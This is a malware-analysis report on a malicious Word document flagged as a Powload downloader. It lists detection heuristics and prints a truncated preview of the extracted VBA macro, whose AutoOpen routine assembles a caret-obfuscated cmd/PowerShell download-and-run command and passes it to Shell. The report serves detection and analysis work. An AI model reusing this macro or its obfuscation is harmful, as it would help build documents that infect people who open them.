MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a command using the Shell function, likely to download and run a second-stage payload. The reconstructed command string is 'md /V /C ^'. The specific family is not identifiable from the provided evidence.
Heuristics 6
-
ClamAV: Doc.Downloader.Powload-6695687-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6695687-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11444 bytes |
SHA-256: fc6ec72562194e5581ec99991228395536680eb259b9637a846cecd9b3ed87cc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fMQZWtf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim FRjPaP(1)
FRjPaP(0) = Mid("cdEdU", 203, 719)
Dim wOqYFm(1)
wOqYFm(0) = MidB("fOLSat", 24, 155)
Dim SQnWul(2)
SQnWul(0) = Right("kblzhNQa", 909)
SQnWul(1) = Mid("tSaCTC", 947, 947)
Dim bEMaiH(2)
bEMaiH(0) = MidB("OSDRnA", 816, 744)
bEMaiH(1) = MidB("mvUKvzjC", 784, 461)
Dim PDMsiO(1)
PDMsiO(0) = MidB("HibduRt", 806, 837)
zFQBulIL (KeyString(4 + 5 + 3 + 11 + 44) + IabWm + ztvNoQfGqMk + OEEiKIsWX + duikU + APYwowb + LEZLDElEfFWD)
Dim JQXUM(2)
JQXUM(0) = MidB("mGqzBB", 327, 149)
JQXUM(1) = MidB("ziSPuHhr", 160, 774)
Dim IlMwM(2)
IlMwM(0) = MidB("rGcKQ", 274, 290)
IlMwM(1) = MidB("zizYKj", 608, 879)
Dim woYiM(2)
woYiM(0) = MidB("ndGBA", 429, 481)
woYiM(1) = MidB("FXwGjnva", 28, 342)
End Sub
Function zFQBulIL(GonhnKz As String)
Dim qjNCN(2)
qjNCN(0) = MidB("EAbYOjw", 873, 187)
qjNCN(1) = Mid("jSnOMSsS", 151, 463)
Dim GKhOmE(1)
GKhOmE(0) = MidB("wfWuGXKX", 291, 422)
Shell@ GonhnKz, CInt(msoBarTypeNormal)
Dim pVhDRw(1)
pVhDRw(0) = Mid("qCHPFYz", 58, 607)
Dim Kcmpwm(2)
Kcmpwm(0) = Mid("tHTkiDNX", 324, 808)
Kcmpwm(1) = Mid("MNKqwikE", 450, 826)
End Function
Attribute VB_Name = "UBRcvIm"
Function IabWm()
Dim nhRLXB(1)
nhRLXB(0) = Left("lEbVrTtB", 738)
bYQFOOsAv = "md" + " " + "/V" + "/C" + ChrW(4 + 3 + 1 + 3 + 23) + "^"
Dim pFlEl(2)
pFlEl(0) = Right("GzzaM", 924)
pFlEl(1) = MidB("VBjaRNnZ", 360, 708)
Dim CuPwRT(2)
CuPwRT(0) = MidB("nJRNhvw", 717, 297)
CuPwRT(1) = Right("mwvucp", 481)
Dim sJomXj(1)
sJomXj(0) = MidB("bVVOWkm", 652, 850)
MQCSdwswz = "s" + "e^t " + "8^J^" + "Z^j=" + " ^ " + "^ "
Dim WlBLcU(2)
WlBLcU(0) = MidB("RnzQFiY", 643, 601)
WlBLcU(1) = Right("MHKmOpF", 395)
Dim wKCbvc(2)
wKCbvc(0) = Right("LCYLqpWU", 314)
wKCbvc(1) = MidB("qHGEXVWd", 803, 838)
Dim pjwFlX(2)
pjwFlX(0) = Right("fnJiNCu", 970)
pjwFlX(1) = Mid("qqAVw", 760, 823)
Dim tztaFq(1)
tztaFq(0) = Left("BdfCEj", 248)
tTYSFUAMlE = " ^ " + " ^ ^" + " " + " ^ ^" + " " + " ^ " + " " + "^ ^" + " ^}^" + "}^" + "{^" + "hct" + "ac}"
Dim BqwbBM(2)
BqwbBM(0) = MidB("YrOmfIK", 261, 257)
BqwbBM(1) = MidB("LSQGtVBf", 598, 907)
Dim LvHvvr(2)
LvHvvr(0) = MidB("tkkoufi", 93, 856)
LvHvvr(1) = Mid("VwwFPnLz", 283, 381)
lzrSEzZ = ";k" + "^" + "a^er" + "^b;h" + "i^" + "b$^ " + "^m" + "et^"
Dim zwVRb(1)
zwVRb(0) = MidB("vhOUqbS", 438, 565)
Dim jXKSiu(2)
jXKSiu(0) = MidB("SiVWUCGM", 373, 938)
jXKSiu(1) = MidB("awCDB", 143, 410)
Dim umqOoL(2)
umqOoL(0) = Left("phztdWD", 936)
umqOoL(1) = MidB("atWIDv", 848, 133)
KZEIsMzjjta = "I-^" + "eko" + "vn^" + "I" + "^;)" + "h" + "^i" + "b^" + "$^ ," + "r" + "^T" + "^" + "S^$"
Dim Ytztj(2)
Ytztj(0) = Left("rMbKaVTH", 367)
Ytztj(1) = Right("NHUklUbB", 250)
Dim GiHbZW(2)
GiHbZW(0) = MidB("MjSFI", 708, 762)
GiHbZW(1) = MidB("tfCDsRt", 28, 848)
auaGowHvdz = "(" + "e" + "^l^" + "i^F^" + "d^" + "a" + "o"
Dim XsVESz(2)
XsVESz(0) = Left("fTmfOhK", 440)
XsVESz(1) = Right("KJcYZ", 75)
Dim PwIUTZ(2)
PwIUTZ(0) = MidB("vIPdJ", 890, 126)
PwIUTZ(1) = Right("hzTRERR", 257)
Dim hMdPw(2)
hMdPw(0) = Mid("zJNpiQ", 332, 459)
hMdPw(1) = Mid("RTJiw", 485, 529)
Dim IKiDV(2)
IKiDV(0) = MidB("fFjjrF", 933, 864)
IKiDV(1) = MidB("PICzirzk", 162, 748)
itwEs = "^ln^" + "w^oD" + "." + "Z" + "jb" + "$^{^" + "y" + "rt" + "^{" + ")V^H" + "^b" + "^"
Dim NkdDPE(1)
NkdDPE(0) = MidB("nkuKSRVj", 342, 216)
Dim oVLZZ(2)
oVLZZ(0) = Left("nnPGYP", 462)
oVLZZ(1) = MidB("ozjzisC", 471, 337)
Dim pVdUwl(2)
pVdUwl(0) = Right("zMlmkipN", 428)
pVdUwl(1) = MidB("qTJiv", 723, 315)
Dim NBKRW(1)
NBKRW(0) = Left("hzGDujMA", 316)
tAMHAl = "$ " + "n^i" + "^ rT" + "^S" + "^$(" + "hc^" + "ae" + "r^" + "o^f;"
Dim IViou(2)
IViou(0) = Mid("SLoZz", 559,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.